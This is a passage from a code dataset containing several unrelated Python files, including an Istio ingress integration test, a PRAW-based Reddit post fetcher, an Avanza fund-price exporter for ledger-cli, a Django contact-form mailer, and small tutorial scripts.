90, \n 100]) \n# printing histogram \nprint() \nprint (hist) \nprint (bins) \nprint() ","sub_path":"NumpyTutorial/Questions on NumPy Strings.py","file_name":"Questions on NumPy Strings.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"36490804","text":"import cv2\nimport numpy as np\n\n\n# xml dosyasından bir nesne alıyoruz\nface_cascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\neyes_cascade = cv2.CascadeClassifier(\"haarcascade_eye.xml\")\n\n\nimage = cv2.imread(\"resim.jpg\")\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# yüzleri tespit ediyor ve liste şeklinde koordinatları döndürüyor\n# 2. aşama resmin boyutunu büyütüyor. 3. parametre kaç kere resmi tarayacağı\nfaces = face_cascade.detectMultiScale(gray, 1.3, 2)\n\n# tüm yüzleri dikdörten içine alacak döngü\nfor(x,y,w,h) in faces:\n cv2.rectangle(image, (x,y), (x+w, y+h), (255,0,0), 2)\n face_section = image[y:y+h, x:x+w]\n\n\ncv2.imshow(\"image\", image)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"ders19/face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"382139910","text":"from dataclasses import dataclass, field, InitVar\nfrom typing import List\n\n\n@dataclass\nclass Book:\n title: str\n author: str\n gen_desc: InitVar[bool] = True\n desc: str = None\n\n def __post_init__(self, gen_desc: bool):\n if gen_desc and self.desc is None:\n self.desc = \"`%s` by %s\" % (self.title, self.author)\n\nbook = Book(title='Test title', author='Test Author', desc='test desc')\nbook2 = Book(title='Test title', author='Test Author')\n\nprint(book == book2)\nprint(book)\n\n\n@dataclass\nclass Bookshelf:\n books: List[Book] = field(default_factory=list)\n\n\nbookshelf = Bookshelf(books=[book, book2])\n\nprint(bookshelf)\n","sub_path":"python_examples/dataclasses_examples/example_01.py","file_name":"example_01.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"545348074","text":"def LettersAround(s):\n\tflag=True\n\tequal=0\n\tplus=0\n\n\tfor i in range(0,len(s)):\n\t\tif(s[i] == '='):\n\t\t\tequal+=1\n\t\t\tcontinue\n\t\telif(s[i] == '+'):\n\t\t\tplus+=1\n\t\t\tcontinue\n\t\telif(s[i].isalpha()):\n\t\t\tif(s[i-1] == '+' and s[i+1] == '+'):\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tflag==False\n\t\t\t\tbreak\n\tif(flag == True and equal>0 and plus > 0):\n\t\tprint(\"Accepted\")\n\telse:\n\t\tprint(\"Rejected\")\nLettersAround(str(input(\"Enter A String :\")))","sub_path":"SL Lab/SL_Lab_Test1/lettersaround.py","file_name":"lettersaround.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"481201088","text":"import logging\nimport pytest\nimport requests\nimport tempfile\nimport time\n\n\nGATEWAY_HTTPBIN = (\"\"\"\n---\napiVersion: networking.istio.io/v1beta1\nkind: Gateway\nmetadata:\n name: httpbin-gateway\n namespace: default\nspec:\n selector:\n istio: ingressgateway\n servers:\n - hosts:\n - '*'\n port:\n name: http\n number: 80\n protocol: HTTP\nEOF\n\"\"\")\n\nGATEWAY_HTTPBIN_SECURE = (\"\"\"\n---\napiVersion: networking.istio.io/v1beta1\nkind: Gateway\nmetadata:\n name: httpbin-gateway\n namespace: default\nspec:\n selector:\n istio: ingressgateway\n servers:\n - port:\n number: 443\n name: https\n protocol: HTTPS\n tls:\n mode: SIMPLE\n credentialName: httpbin-credential\n hosts:\n - 'httpbin.example.com'\nEOF\n\"\"\")\n\nVIRTUALSERVICE_HTTPBIN = (\"\"\"\n---\napiVersion: networking.istio.io/v1alpha3\nkind: VirtualService\nmetadata:\n name: httpbin\nspec:\n hosts:\n - '*'\n gateways:\n - httpbin-gateway\n http:\n - match:\n - uri:\n prefix: /status\n - uri:\n prefix: /delay\n route:\n - destination:\n port:\n number: 8000\n host: httpbin\nEOF\n\"\"\")\n\nISTIO_VERSION = \"1.5\"\nISTIO_VERSION_PATCH = ISTIO_VERSION + \".9\"\nISTIO_URL = \"https://raw.githubusercontent.com/istio/istio/release-\" + ISTIO_VERSION + \"/samples\"\n\ndef _istio_httpbin_setup(kubectl):\n istioctl = (\"\"\"\n istioctl --kubeconfig={config} manifest apply \\\n --set profile=default \\\n --set addonComponents.prometheus.enabled=false \\\n --set hub=registry.suse.de/devel/caasp/4.5/containers/containers/caasp/v4.5 \\\n --set tag={version} \\\n --set values.pilot.image=istio-pilot \\\n --set values.global.proxy.image=istio-proxyv2 \\\n --set values.global.proxy_init.image=istio-proxyv2\n \"\"\".format(config=kubectl.get_kubeconfig(), version=ISTIO_VERSION_PATCH))\n\n kubectl.utils.runshellcommand(istioctl)\n kubectl.run_kubectl(\"-n istio-system wait --for=condition=available deploy/istio-ingressgateway --timeout=3m\")\n\n kubectl.run_kubectl(f\"apply -f {ISTIO_URL}/httpbin/httpbin.yaml\")\n\n\ndef _cleanup(kubectl):\n kubectl.run_kubectl(f\"delete -f {ISTIO_URL}/httpbin/httpbin.yaml\")\n istioctl_delete = (\"\"\"\n istioctl --kubeconfig={config} manifest generate \\\n --set profile=default \\\n --set addonComponents.prometheus.enabled=false \\\n --set hub=registry.suse.de/devel/caasp/4.5/containers/containers/caasp/v4.5 \\\n --set tag={version} \\\n --set values.pilot.image=istio-pilot \\\n --set values.global.proxy.image=istio-proxyv2 \\\n --set values.global.proxy_init.image=istio-proxyv2 \\\n | kubectl --kubeconfig={config} delete -f - || true\n \"\"\".format(config=kubectl.get_kubeconfig(), version=ISTIO_VERSION_PATCH))\n kubectl.utils.runshellcommand(istioctl_delete)\n\n\ndef _test_non_TLS(kubectl, worker_ip, logger):\n \"\"\"\n Verify that httpbin service can be accessed through the istio ingress\n \"\"\"\n\n logger.info(\"Create the istio config\")\n kubectl.run_kubectl(\"apply -f - << EOF \" + GATEWAY_HTTPBIN)\n kubectl.run_kubectl(\"apply -f - << EOF \" + VIRTUALSERVICE_HTTPBIN)\n\n # Wait for istio to digest the config\n time.sleep(100)\n\n nodePort = kubectl.run_kubectl(\"-n istio-system get service/istio-ingressgateway -o jsonpath='{ .spec.ports[1].nodePort }'\")\n\n assert 30000 <= int(nodePort) <= 32767\n\n url = \"{protocol}://{ip}:{port}{path}\".format(protocol=\"http\", ip=str(worker_ip), port=str(nodePort), path=\"/status/200\")\n r = requests.get(url, headers={'host': 'httpbin.example.com'})\n\n assert 200 == r.status_code\n\n\ndef _test_TLS(kubectl, worker_ip, logger):\n \"\"\"\n Verify that httpbin service can be accessed through the istio ingress using TLS\n \"\"\"\n # Create a temporary directory for the CA certificate\n temp_dir = tempfile.TemporaryDirectory()\n\n logger.info(\"Create the certificate\")\n openssl_list = [\"openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:2048 -subj '/O=example Inc./CN=example.com' -keyout example.com.key -out {directory}/example.com.crt\".format(directory=temp_dir.name),\n 'openssl req -out httpbin.example.com.csr -newkey rsa:2048 -nodes -keyout httpbin.example.com.key -subj \"/CN=httpbin.example.com/O=httpbin organization\"',\n \"openssl x509 -req -days 365 -CA {directory}/example.com.crt -CAkey example.com.key -set_serial 0 -in httpbin.example.com.csr -out httpbin.example.com.crt\".format(directory=temp_dir.name)]\n for cmd in openssl_list:\n kubectl.utils.runshellcommand(cmd)\n\n logger.info(\"Create the secret\")\n kubectl.run_kubectl(\"-n istio-system create secret tls httpbin-credential --key=httpbin.example.com.key --cert=httpbin.example.com.crt\")\n\n logger.info(\"Create the istio config\")\n kubectl.run_kubectl(\"apply -f - << EOF \" + GATEWAY_HTTPBIN_SECURE)\n \n # Wait for istio to digest the config\n time.sleep(60)\n\n secure_nodePort = kubectl.run_kubectl(\"-n istio-system get service/istio-ingressgateway -o jsonpath='{ .spec.ports[2].nodePort }'\")\n\n assert 30000 <= int(secure_nodePort) <= 32767\n\n url = \"{protocol}://{ip}:{port}{path}\".format(protocol=\"https\", ip='httpbin.example.com', port=str(secure_nodePort), path=\"/status/200\")\n curl_command = \"(curl -v -HHost:httpbin.example.com --resolve 'httpbin.example.com:{port}:{ip}' \\\n --cacert {directory}/example.com.crt \\\n {url}) 2>&1\".format(port=secure_nodePort, ip=str(worker_ip), directory=temp_dir.name, url=url)\n \n output = kubectl.utils.runshellcommand(curl_command)\n\n assert \"HTTP/2 200\" in output\n\n\ndef test_istio_ingress(deployment, platform, skuba, kubectl):\n logger = logging.getLogger(\"testrunner\")\n logger.info(\"Deploying istio and httpbin\")\n _istio_httpbin_setup(kubectl)\n\n wrk_idx = 0\n ip_addresses = platform.get_nodes_ipaddrs(\"worker\")\n worker_ip = ip_addresses[wrk_idx]\n\n logger.info(\"Testing the non-TLS use case\")\n _test_non_TLS(kubectl, worker_ip, logger)\n\n logger.info(\"Testing now the TLS use case\")\n _test_TLS(kubectl, worker_ip, logger)\n\n _cleanup(kubectl)\n","sub_path":"ci/infra/testrunner/tests/test_istio_ingress.py","file_name":"test_istio_ingress.py","file_ext":"py","file_size_in_byte":6475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"85925603","text":"import asyncio\nimport random\nimport time\nfrom praw.exceptions import ClientException\nfrom prawcore.exceptions import NotFound, ResponseException, Forbidden, Redirect, BadRequest\n#import logging\nimport config\nfrom exceptions import *\nfrom urltype import UrlType\nfrom praw.models import MoreComments, Submission\nConfig = config.Config('config.ini')\n\n\nclass Reddit:\n\n def __init__(self, praw_object):\n self._praw_object = praw_object\n\n async def get(self, **kwargs):\n subreddit = kwargs.get('subreddit', None)\n post_count = int(kwargs.get('post_count', Config.r_postcount))\n image = kwargs.get('get_image', None)\n nsfw = bool(kwargs.get('nsfw', False))\n request_type = kwargs.get('request_type', 'default')\n url = kwargs.get('url', None)\n loop = asyncio.get_event_loop()\n\n if request_type == 'url': # subreddit is set to the url in this case\n\n print(\"Request Type is URL\")\n\n def get_from_url():\n return self.__get_post_from_url(url)\n\n future10 = loop.run_in_executor(None, get_from_url)\n post_data = await future10\n\n return post_data\n\n # if not a url continue with normal post-grabbing\n if post_count > Config.r_maxpostcount:\n post_count = Config.r_maxpostcount\n\n # check if the subreddit exists, using do_req function to keep async shit however it works\n def do_req():\n return self.check_if_sub_exists(subreddit)\n\n # have to do some asyncio shit\n\n future = loop.run_in_executor(None, do_req)\n\n if_sub_exists = await future # should be either True (exists) or False (doesnt exist)\n\n # if subreddit does not exist, raise an error\n if not if_sub_exists:\n raise SubredditNotExist(str(subreddit) + \" does not exist (returned to search page)\")\n\n # check if the sub is nsfw if requested for no nsfw stuff\n\n if not nsfw:\n def nsfw_req():\n return self.check_if_over18(subreddit)\n\n future2 = loop.run_in_executor(None, nsfw_req)\n result = await future2\n\n if result:\n raise SubredditIsNSFW(str(subreddit) + \" is a NSFW subreddit\")\n\n # now time for the fun stuff\n\n # grabbing the posts\n\n def get_the_posts():\n return self.__get_posts(subreddit, post_count, image, nsfw)\n\n future3 = loop.run_in_executor(None, get_the_posts)\n posts = await future3\n\n # check if we actually have posts\n posts_length = len(posts)\n if posts_length < 1:\n raise NoPostsReturned(\n \"No Posts Returned for subreddit \" + str(subreddit) + \" with a post count of \" + str(post_count))\n # now we need to randomly grab a post\n\n random_post_num = random.randint(0, posts_length - 1)\n\n # and finally return everything\n\n return posts[random_post_num]\n\n def check_if_sub_exists(self, subreddit):\n \"\"\"\n Check if the subreddit exists\n This is also just where we check for any credential errors etc\n\n :param subreddit:\n :return:\n \"\"\"\n try:\n test = self._praw_object.subreddit(subreddit).new(limit=1)\n test.next()\n return True\n except NotFound:\n return False\n except Forbidden:\n raise RedditForbiddenAccess\n except Redirect:\n return False\n except BadRequest:\n return False\n except ResponseException as e:\n raise RedditOAuthException(e)\n\n def check_if_over18(self, subreddit):\n try:\n if self._praw_object.subreddit(subreddit).over18:\n return True\n return False\n except NotFound:\n # subreddit cannot be checked for 18+\n return False\n\n def __get_posts(self, subreddit, post_count, image, nsfw):\n\n posts = []\n\n for post in self._praw_object.subreddit(subreddit).hot(limit=post_count):\n skip_post = False\n post_url = str(post.url)\n post_author = str(post.author)\n if post.over_18 and not nsfw:\n skip_post = True\n # get the type of post (based on the URL)\n post_type = UrlType(post.domain, post_url, post.subreddit, post.permalink).get_url_type() # TODO - this is a asynced class shit need to fix\n\n # if image is true, only get image based posts\n # if not, only get links and post\n # if None, any post type\n\n if image is not None:\n if image:\n if post_type == \"link\" or post_type == \"reddit\":\n skip_post = True\n else:\n if post_type != \"link\" and post_type != \"reddit\":\n skip_post = True\n\n # skip any posts with a blacklisted author\n if post_author in Config.r_ignore_users:\n skip_post = True\n\n # skip any mod posts if set\n if (post.distinguished == \"moderator\") and Config.r_skip_mod_posts:\n skip_post = True\n\n # skip any stickied posts if set\n if post.stickied and Config.r_skip_stickied_posts:\n skip_post = True\n\n # skip any removed posts\n if post.removal_reason is not None:\n skip_post = True\n\n # save this post\n\n if skip_post is False:\n posts.append(self.__get_post_data(post, post_type, post_url, subreddit))\n\n return posts\n\n def __get_post_from_url(self, url):\n try:\n submission = self._praw_object.submission(url=url)\n except ClientException as e:\n raise InvalidRedditURL(\"Invalid Reddit Submission URL. Details (ClientException): \" + str(e))\n except NotFound as e:\n raise InvalidRedditURL(\"Invalid Reddit Submission URL. Details (NotFound Exception): \" + str(e))\n except Exception as e:\n raise UnknownException(\"Unknown Exception when trying to get submission from URL. Maybe invalid url?\")\n # get post type\n try:\n post_type = UrlType(submission.domain, submission.url, submission.subreddit, submission.permalink).get_url_type()\n except NotFound as e:\n raise InvalidRedditURL(\"Invalid Reddit Submission URL. Details (NotFound Exception): \" + str(e))\n\n return self.__get_post_data(submission, post_type, submission.url, str(submission.subreddit))\n\n def __get_post_data(self, post: Submission, post_type, post_url, subreddit):\n \"\"\"\n Get post information from a post from reddit.\n \"\"\"\n # check post length\n post_text = post.selftext\n post_title = post.title\n if len(post_text) > 1850:\n post_text = (post_text[:1850] + ' (...)')\n\n # we also need to check the title length as discord embed titles are limited to 256 characters long\n\n if len(post_title) + len(str(post.domain)) > 256:\n post_title = (post_title[:250 - len(str(post.domain))] + '...')\n\n post_title += f\" [{post.domain}]\"\n created_utc = int(post.created_utc)\n created_utc = time.strftime('%Y-%m-%d %H:%M', time.gmtime(created_utc))\n\n return {'post_id': str(post.id),\n 'post_url': post_url,\n 'post_author': str(post.author),\n 'nsfw': bool(post.over_18),\n 'post_title': str(post_title),\n 'post_score': int(post.score),\n 'post_length': len(post_text),\n 'post_text': post_text,\n 'post_type': post_type,\n 'post_permalink': \"https://reddit.com\" + str(post.permalink),\n 'post_subreddit': post.subreddit,\n 'created_utc': created_utc,\n 'post_preview': str(post.thumbnail),\n 'gilded': int(post.gilded),\n 'domain': str(post.domain)\n\n }\n\n def get_comments_by_list(self, submission_id, **kwargs):\n\n submission = self._praw_object.submission(submission_id)\n return self.process_comments(submission.comments.list()[0:int(kwargs.get('max_comments', len(submission.comments.list())))])\n\n # Where MoreComments is a MoreComments object\n # gets the comments the MoreComments object represents\n def get_more_comments(self, morecomments):\n\n # # See PRAW docs for more info\n # # https://praw.readthedocs.io/en/latest/code_overview/other/commentforest.html#praw.models.comment_forest.CommentForest.replace_more\n \n if isinstance(morecomments, MoreComments):\n comments = morecomments.comments(update=True)\n return self.process_comments(comments)\n\n # Process the comments by editing them (e.g date formatting etc)\n @staticmethod\n def process_comments(comments):\n\n new_comments = []\n \n for comment in comments:\n\n # skip if it is a MoreComments Instance\n if isinstance(comment, MoreComments):\n new_comments.append(comment)\n continue\n\n try:\n\n if comment.author in Config.r_ignore_users:\n continue # skip\n \n if comment.depth > 0: # only want top level comments at this stage\n continue\n\n if Config.r_skip_stickied_comments and str(comment.stickied).lower() == \"true\":\n print(\"Skipping comment as it is stickied\")\n continue\n\n # convert the time to human readable\n comment.created_utc = time.strftime('%Y-%m-%d %H:%M', time.gmtime(\n int(comment.created_utc)))\n\n comment.permalink = \"https://reddit.com\" + str(comment.permalink)\n new_comments.append(comment) \n\n except IndexError:\n pass\n except Exception as e:\n raise UnknownException(str(e) + \" COMMENTS\")\n # TODO: if an exception for this, fix it\n\n return new_comments\n\n","sub_path":"reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":10182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"324912285","text":"import requests\nfrom bs4 import BeautifulSoup\n\n# 1. url 설정\nurl = 'https://finance.naver.com/marketindex/exchangeList.nhn'\n# 2. 요청 보내기\nresponse = requests.get(url).text\n# 3. HTML문서로 바꾸기\nsoup = BeautifulSoup(response, 'html.parser')\n# 4. 원하는 내용을 선택자로 뽑아내기\ntable = soup.select('body > div > table > tbody > tr')\nname = soup.select('body > div > table > tbody > tr')\n# .select 갯수에 상관없이 List로 반환함\n# .select_one 하나일 경우 or [0]으로 요소하나만 받아오기\nfor tr in table:\n print(tr.select('td.tit')[0].text.strip(), tr.select('td.sale')[0].text)","sub_path":"day2/dollar.py","file_name":"dollar.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"262935315","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Exports Avanza fund-data to ledger-cli.\"\"\"\n\nfrom __future__ import print_function\n\nimport io\nimport os\nimport gzip\nimport json\nimport argparse\ntry: # Python 3?\n import http.client as httplib\n from configparser import ConfigParser\nexcept ImportError:\n # pylint: disable=F0401\n import httplib\n from ConfigParser import ConfigParser\nfrom datetime import datetime\n\nPOST_TEMPLATE = {\n \"orderbookIds\": [],\n \"charttype\": \"orderbook\",\n \"parentContext\": \"fund\",\n \"mydate\": [\"Från\", \"Till\"],\n \"timePeriod\": \"month\",\n \"widthOfPlotContainer\": 446,\n \"percentGraph\": True\n}\n\nPOST_HEADERS = {\n \"Accept\": \"application/json, text/javascript, */*; q=0.01\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"application/json; charset=UTF-8\",\n}\n\ndef output_ledger(funds, data):\n \"\"\"Output price-data for funds in ledger-cli pricedb-format.\"\"\"\n for fund in data.get('graphDataPointSeries'):\n fund_id = int(fund.get('orderbookId'))\n first_day = funds[fund_id]['buying_date']\n points = fund.get('displayablePoints')\n for point in points:\n day = datetime.fromtimestamp(point[2].get('date')/1000)\n if day < first_day:\n continue\n print('P '\n + day.strftime('%Y/%m/%d %H:%M:%S ')\n + funds[fund_id]['commodity_name'] + ' '\n + str(point[2].get('closingPrice')))\n\ndef input_avanza(funds):\n \"\"\"Read data for funds from Avanzas unofficial API.\"\"\"\n POST_TEMPLATE['orderbookIds'] = list(funds.keys())\n post_data = json.dumps(POST_TEMPLATE)\n\n conn = httplib.HTTPSConnection('www.avanza.se')\n conn.request('POST', '/ab/component/flotchart/getchart/orderbook',\n post_data, POST_HEADERS)\n resp = conn.getresponse()\n\n if resp.status != 200:\n print(str(resp.status) + \" \" + resp.reason)\n exit(1)\n\n byte_buf = resp.read()\n if len(byte_buf) > 2 and byte_buf[:2] == b'\\x1f\\x8b':\n comp_buf = io.BytesIO(byte_buf)\n decomp_buf = gzip.GzipFile(fileobj=comp_buf)\n data = json.loads(decomp_buf.read().decode('utf_8'))\n else:\n data = json.loads(resp.read().decode('utf_8'))\n\n return data\n\ndef read_config(filename):\n \"\"\"Read configuration of which funds to fetch data for.\"\"\"\n config = ConfigParser()\n config.read(filename)\n\n funds = dict()\n for fund_sec in config.sections():\n date = datetime.strptime(config.get(fund_sec, 'buying_date'),\n '%Y-%m-%d')\n funds[int(config.get(fund_sec, 'id'))] = dict({\n \"name\": fund_sec,\n \"commodity_name\": config.get(fund_sec, 'commodity_name'),\n \"buying_date\": date\n })\n\n return funds\n\ndef main():\n \"\"\"Main function for when called as an executable.\"\"\"\n parser = argparse.ArgumentParser(\n description='Gets value of funds from Avanza, and outputs them in'\n ' ledger-cli compatible format')\n parser.add_argument('-c', '--config',\n help='Configuration file with funds. Defaults to'\n ' ~/.avanza2ledger.ini')\n args = parser.parse_args()\n\n if args.config:\n funds = read_config(args.config)\n else:\n funds = read_config(os.path.expanduser('~/.avanza2ledger.ini'))\n\n data = input_avanza(funds)\n output_ledger(funds, data)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"avanza2ledger.py","file_name":"avanza2ledger.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"308237210","text":"# -*- mode: python -*-\n# coding: utf-8\nblock_cipher = None\n\na = Analysis(\n ['./tickeys/run.py'],\n pathex=['./tickeys'],\n binaries=[\n ('lib/32/libmodplug.so.1',\".\"),\n ('lib/32/libSDL2_ttf-2.0.so.0',\".\"),\n ('lib/32/libSDL2_image-2.0.so.0',\".\"),\n ('lib/32/libSDL2_mixer-2.0.so.0',\".\"),\n ('lib/32/libSDL2-2.0.so.0',\".\"),\n ('lib/32/libsndio.so.6.0',\".\"),\n ], # 动态库\n datas=[(\"./tickeys/tickeys.png\",\".\")], # 数据文件,可以是任意文件类型,例如ini配置文件、字体文件、图片等\n hiddenimports=['six','packaging', 'packaging.version', 'packaging.specifiers'],\n hookspath=None,\n runtime_hooks=None,\n excludes=None,\n win_no_prefer_redirects=None,\n win_private_assemblies=None,\n cipher=block_cipher)\na.datas += Tree(\"./tickeys/Resources\", prefix = \"Resources\")\na.datas += Tree(\"./tickeys/kivy\", prefix = \"kivy\")\na.datas += Tree(\"./tickeys/locale\", prefix = \"locale\")\npyz = PYZ(a.pure, a.zipped_data, cipher=block_cipher)\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n name='Tickeys',\n debug=False,\n strip=None,\n upx=True,\n console=True\n )\n","sub_path":"build32.spec","file_name":"build32.spec","file_ext":"spec","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"555457629","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of INSPIRE.\n# Copyright (C) 2015, 2016 CERN.\n#\n# INSPIRE is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License as\n# published by the Free Software Foundation; either version 2 of the\n# License, or (at your option) any later version.\n#\n# INSPIRE is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with INSPIRE; if not, write to the Free Software Foundation, Inc.,\n# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.\n\n\"\"\"Model for WorkflowsAudit.\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport os\n\nfrom flask import current_app\n\nfrom .models import WorkflowsAudit\n\n\ndef get_storage_path(suffix=\"\"):\n \"\"\"Return workflow storage path.\"\"\"\n storage_path = os.path.join(\n current_app.config.get(\n 'WORKFLOWS_STORAGEDIR',\n current_app.config.get('CFG_TMPSHAREDDIR')\n ),\n suffix\n )\n if not os.path.exists(storage_path):\n os.makedirs(storage_path)\n return storage_path\n\n\ndef log_workflows_action(action, prediction_results,\n object_id, user_id,\n source, user_action=\"\"):\n \"\"\"Log the action taken by user compared to a prediction.\"\"\"\n if prediction_results:\n score = prediction_results.get(\"max_score\") # returns 0.222113\n decision = prediction_results.get(\"decision\") # returns \"Rejected\"\n\n # Map actions to align with the prediction format\n action_map = {\n 'accept': 'Non-CORE',\n 'accept_core': 'CORE',\n 'reject': 'Rejected'\n }\n\n logging_info = {\n 'object_id': object_id,\n 'user_id': user_id,\n 'score': score,\n 'user_action': action_map.get(user_action, \"\"),\n 'decision': decision,\n 'source': source,\n 'action': action\n }\n audit = WorkflowsAudit(**logging_info)\n audit.save()\n","sub_path":"inspirehep/modules/workflows/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"588079447","text":"def cum_sum(a):\r\n cumsum = []\r\n sum_1 = 0\r\n for each in a:\r\n sum_1 += each\r\n cumsum.append(sum_1)\r\n return cumsum\r\n\r\n\r\nt = [1, 2, 3]\r\nprint(f\"original list: {t}\")\r\nprint(f\"Cummulative sum list: {cum_sum(t)}\")\r\n","sub_path":"Jan26/Assignment/Q6.py","file_name":"Q6.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"469882258","text":"import numpy as np\ndef floyd(graph):\n n = len(graph)\n for k in range(n):\n for i in range(n):\n for j in range(n):\n if graph[i][k] + graph[k][j] < graph[i][j]:\n graph[i][j] = graph[i][k] + graph[k][j]\n\n\ndata = [[0,1.1,np.inf],[np.inf,0,2],[2,35,0]]\nfloyd(data)\nprint(data)","sub_path":"two datasets/ISOMAP.py","file_name":"ISOMAP.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"282323025","text":"from tkinter import *\nfrom PIL import ImageTk, Image\n\nfilename = 'StylishAA.jpg'\nimg = Image.open(filename)\nresized_img = img.resize((350, 500))\n\nroot = Tk()\n\nroot.title(\"Know To Code\")\nroot.iconbitmap('E:\\Bharath\\Python\\PYTHONprograms\\Tkinter\\Calculator.ico')\n\nroot.photoimg = ImageTk.PhotoImage(resized_img)\nlabelimage = Label(root, image=root.photoimg)\nlabelimage.pack()\n\n# the below works if no resizing\n\n# my_img=ImageTk.PhotoImage(Image.open(img location))\n# lab=Label(image=my_img)\n# lab.pack()\n\n\next = Button(root, text='Exit', command=root.quit)\next.pack()\n\nroot.mainloop()\n\n'''\nfilename = 'bell.jpg'\nimg = Image.open(filename)\nresized_img = img.resize((200, 100))\n\nroot = tk.Tk()\nroot.photoimg = ImageTk.PhotoImage(resized_img)\nlabelimage = tk.Label(root, image=root.photoimg)\nlabelimage.pack()\n\n'''\n","sub_path":"Python Programs/Tkinter/IconsImagesExit.py","file_name":"IconsImagesExit.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"160186138","text":"from django.shortcuts import render\nfrom django.core.mail import send_mail\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom .forms import emailForm\nfrom django.urls import reverse_lazy\nfrom django.db import models\nfrom core.models import Photos\n\n\n# Create your views here.\n\n\ndef index(request):\n \n if request.method == 'POST':\n #------------------------- CONTATO ------------------------#\n if (request.POST[\"firstname\"] != None):\n \n name = request.POST['firstname']\n sobrenome = request.POST['lastname']\n telefone = request.POST['usrtel']\n email = request.POST['email']\n servico = request.POST['service']\n conheceu = request.POST['meet']\n assunto = request.POST['subject']\n mensagem = request.POST['message']\n\n fullContent2 = 'Nome: {}\\nSobrenome: {}\\nTelefone: {}\\nEmail: {}\\nServiço: {}\\nComo conheceu: {}\\nAssunto: {}\\nMensagem: {}' .format(name, sobrenome, telefone, email, servico, conheceu, assunto, mensagem)\n \n send_mail(\n 'CONTATO CADASTRADO', # Assunto do email\n fullContent2, # Corpo do email\n 'perilucas95@gmail.com', # email de envio\n ['perilucas95@gmail.com'], # email de destino\n fail_silently=False,\n )\n\n return render(request, 'home.html') \n\n else:\n form = emailForm()\n #photo = Photos.objects.all()\n\n # Caso a página tenha sido acessada via URL gera um form em branco ( , 'servicos':servico)\n return render(request, 'home.html', {'form': form})","sub_path":"monettegourmet/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"359315833","text":"# -*- coding: UTF-8 -*-\nfrom core.utils.helpers import enum\n\nPROTOCOL_LOGIN = 0x0201\nPROTOCOL_GAME = 0x020A\n\nMAP_WIDTH = 18\nMAP_HEIGHT = 14\n\nMESSAGE_TYPES = enum(\n MSG_RED=0x16,\n MSG_DARK_BLUE=0x15,\n MSG_SMALLINFO=0x14,\n MSG_INFO=0x13,\n MSG_EVENT=0x11,\n MSG_STATUS=0x12,\n MSG_ADVANCE=0x10,\n MSG_LIGHT_BLUE=0x04,\n MSG_SERVERSAY=0x09,\n)\n\nDIRECTIONS = enum(\n NORTH=0,\n EAST=1,\n SOUTH=2,\n WEST=3\n)\n\nWEAPON_TYPES = enum(\n \"NONE\", \"SWORD\", \"CLUB\", \"AXE\", \"DIST\", \"FISH\", \"MAGIC\", \"AMO\", \"SHIELD\"\n)\n","sub_path":"core/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"103371836","text":"# Make a local sqlite database to store and query temporary time series data\n\nimport os\nimport sqlite3\nfrom contextlib import closing\n\nimport pandas as pd\n\nmake_name_tbl = (\n 'CREATE TABLE TS_NAME ('\n ' id INTEGER PRIMARY KEY,'\n ' name VARCHAR(500) NOT NULL,'\n ' alias VARCHAR(500),'\n ' CONSTRAINT TS_NAME_uindex UNIQUE (name))'\n)\nmake_value_tbl = (\n 'CREATE TABLE TS_VALUE ('\n ' id INTEGER PRIMARY KEY,'\n ' nameId INTEGER,'\n ' ts TIMESTAMP NOT NULL,'\n ' value decimal(25, 10) NOT 